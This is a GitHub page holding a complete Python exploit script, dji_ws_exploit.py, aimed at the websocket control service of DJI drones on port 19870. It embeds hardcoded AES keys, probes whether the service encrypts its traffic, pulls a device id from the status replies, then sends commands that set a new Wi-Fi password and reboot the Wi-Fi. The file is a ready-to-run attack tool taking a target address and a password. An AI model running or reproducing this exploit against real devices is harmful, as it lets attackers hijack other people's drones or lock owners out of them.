-
Notifications
You must be signed in to change notification settings - Fork 19
/
dji_ws_exploit.py
120 lines (94 loc) · 3.53 KB
/
dji_ws_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
import sys
import argparse
from websocket import *
import base64
from Crypto.Cipher import AES
import json
# JSON command templates sent over the websocket by wf_exploit().
# Both carry the same fixed "SEQ" value.

# Password change request; the single %s placeholder receives the new password.
CMD_SETPASS = (
    '{"SEQ":"12345",'
    '"CMD":"SetPasswordEx",'
    '"VALUE":"%s"}'
)

# Wi-Fi reboot request; takes no parameters.
CMD_REBOOT = (
    '{"SEQ":"12345",'
    '"CMD":"DoRebootWifi"}'
)
class dji_WebSocket(WebSocket):
    """WebSocket client that can wrap every message in AES-CBC plus base64.

    With ``encryption`` enabled, outgoing payloads are padded, encrypted with
    ``key_in`` and base64-encoded before being handed to the base class;
    incoming messages are base64-decoded, decrypted with ``key_out`` and
    unpadded. Both directions use an all-zero IV. With ``encryption``
    disabled, ``send``/``recv`` pass data through to ``WebSocket`` untouched.
    """

    # The 32-character strings below are passed to AES as-is (they are not
    # hex-decoded), i.e. each one is used as a 32-byte key.
    # Key used by decrypt() for messages received from the peer.
    key_out = "e86aada34f6775290ba62ef372f0289f"
    # Key used by encrypt() for messages sent to the peer.
    key_in = "d93fedf01f9642769bd82ca098d1368f"

    def __init__(self, encryption=True, get_mask_key=None, sockopt=None, sslopt=None,
                 fire_cont_frame=False, enable_multithread=False,
                 skip_utf8_validation=False, **_):
        """Create the socket.

        ``encryption`` selects whether send()/recv() apply the AES layer; it
        may be changed later through the ``encryption`` attribute. All other
        arguments are forwarded unchanged to ``WebSocket.__init__``.
        """
        self.encryption = encryption
        super(dji_WebSocket, self).__init__(get_mask_key, sockopt, sslopt,
                                            fire_cont_frame, enable_multithread,
                                            skip_utf8_validation, **_)

    @staticmethod
    def _to_bytes(data):
        """Return ``data`` as a byte string, UTF-8 encoding it if it is text."""
        return data if isinstance(data, bytes) else data.encode("utf-8")

    def encrypt(self, raw):
        """Pad ``raw``, AES-CBC encrypt it with ``key_in`` and return base64."""
        padded = self._pad(raw)
        iv = b'\x00' * AES.block_size
        cipher = AES.new(self._to_bytes(self.key_in), AES.MODE_CBC, iv)
        return base64.b64encode(cipher.encrypt(padded))

    def decrypt(self, enc):
        """Base64-decode ``enc``, AES-CBC decrypt it with ``key_out`` and unpad.

        Where ``str`` is the byte-string type (Python 2) the plaintext is
        returned unchanged; otherwise it is decoded as UTF-8 so callers can
        treat the result as text.
        """
        raw = base64.b64decode(enc)
        iv = b'\x00' * AES.block_size
        cipher = AES.new(self._to_bytes(self.key_out), AES.MODE_CBC, iv)
        plain = self._unpad(cipher.decrypt(raw))
        return plain if isinstance(plain, str) else plain.decode("utf-8")

    def _pad(self, s):
        """Append N bytes of value N so the length is a multiple of the block size.

        A full block of padding is added when ``s`` is already aligned.
        """
        data = self._to_bytes(s)
        pad_len = AES.block_size - len(data) % AES.block_size
        return data + bytes(bytearray([pad_len]) * pad_len)

    def _unpad(self, s):
        """Strip the padding added by _pad(); the last byte gives its length."""
        if not s:
            # Nothing to strip; ord() on an empty slice would raise TypeError.
            return s
        return s[:-ord(s[-1:])]

    def send(self, payload, opcode=ABNF.OPCODE_TEXT):
        """Send ``payload``, encrypting it first when encryption is enabled.

        ``opcode`` is forwarded to ``WebSocket.send`` and that call's result
        is returned.
        """
        data = self.encrypt(payload) if self.encryption else payload
        return super(dji_WebSocket, self).send(data, opcode)

    def recv(self):
        """Receive one message, decrypting it when encryption is enabled."""
        buf = super(dji_WebSocket, self).recv()
        if not self.encryption:
            return buf
        return self.decrypt(buf)
def wf_exploit(target, pwd):
    """Set a new Wi-Fi password via the websocket service on ``target`` and reboot Wi-Fi.

    Steps, all against port 19870 of ``target``:

    1. Connect to ``/general`` without encryption and read one message; if it
       contains neither ``"`` nor ``:`` the traffic is treated as encrypted.
    2. Reconnect with the detected setting, read five replies and take the
       ``FILE`` field of the third one as the device id.
    3. Connect to ``/controller/wifi/<id>``, send the set-password command
       built from ``pwd``, then the reboot command, reading one reply each.

    Args:
        target: Host name or IP address of the websocket server.
        pwd: New Wi-Fi password; it is JSON-escaped before being sent.

    Raises:
        SystemExit: with status 1 when the device status reply cannot be
            parsed or does not mention the Wi-Fi settings URL.

    ``WebSocketException`` is caught and printed. The socket is closed on
    every exit path.
    """
    ws_general = "ws://%s:19870/general" % target
    ws = dji_WebSocket(encryption=False)
    try:
        # Probe in plain mode first: a reply without any '"' or ':' cannot be
        # plain JSON, so it is assumed to be an encrypted blob.
        print("[*] Connecting to %s" % ws_general)
        ws.connect(ws_general)
        data = ws.recv()
        enc = '"' not in data and ':' not in data
        print("[*] Determined encryption: %s" % ("enabled" if enc else "disabled"))
        ws.close()

        ws.encryption = enc
        ws.connect(ws_general)
        # Depending on the aircraft model the server may return another number of replies
        ws.recv()  # first reply (app status), discarded
        ws.recv()  # second reply (app version), discarded
        devicestatus = ws.recv()
        ws.recv()  # trailing event, discarded
        ws.recv()  # trailing event, discarded

        try:
            dev_hash = json.loads(devicestatus)["FILE"]
        except (ValueError, KeyError, TypeError):
            print("[-] Cannot parse device status reply")
            sys.exit(1)
        print("[*] Grabbed id value: %s" % dev_hash)
        ws.close()

        wf_cfg = "/controller/wifi/%s" % dev_hash
        # str.find() returns -1 (truthy) when the text is missing, so test
        # membership explicitly instead of negating its result.
        if wf_cfg not in devicestatus:
            print("[-] Cannot find wi-fi settings url")
            sys.exit(1)

        ws_wifi = "ws://%s:19870/controller/wifi/%s" % (target, dev_hash)
        print("[*] Connecting to %s" % ws_wifi)
        ws.connect(ws_wifi)

        print("[*] Setting new password for wi-fi network")
        # Escape the password as a JSON string body (quotes stripped) so that
        # characters such as '"' or '\\' cannot break the command message.
        ws.send(CMD_SETPASS % json.dumps(pwd)[1:-1])
        ws.recv()

        print("[*] Rebooting wi-fi")
        ws.send(CMD_REBOOT)
        ws.recv()
        print("[!] Success")
    except WebSocketException as e:
        print(e)
    finally:
        # Release the connection whether the run succeeded, failed or exited.
        ws.close()
def parse_args():
    """Parse the command line and return the resulting namespace.

    Two positional arguments are required: ``target`` and ``password``.
    """
    cli = argparse.ArgumentParser(description="DJI web socket utilization tool")
    positionals = (
        ("target", "Target domain name or ip address"),
        ("password", "New wi-fi password"),
    )
    for arg_name, arg_help in positionals:
        cli.add_argument(arg_name, help=arg_help)
    return cli.parse_args()
# Script entry point: read target and password from the command line and run.
if __name__ == "__main__":
    cli_args = parse_args()
    wf_exploit(target=cli_args.target, pwd=cli_args.password)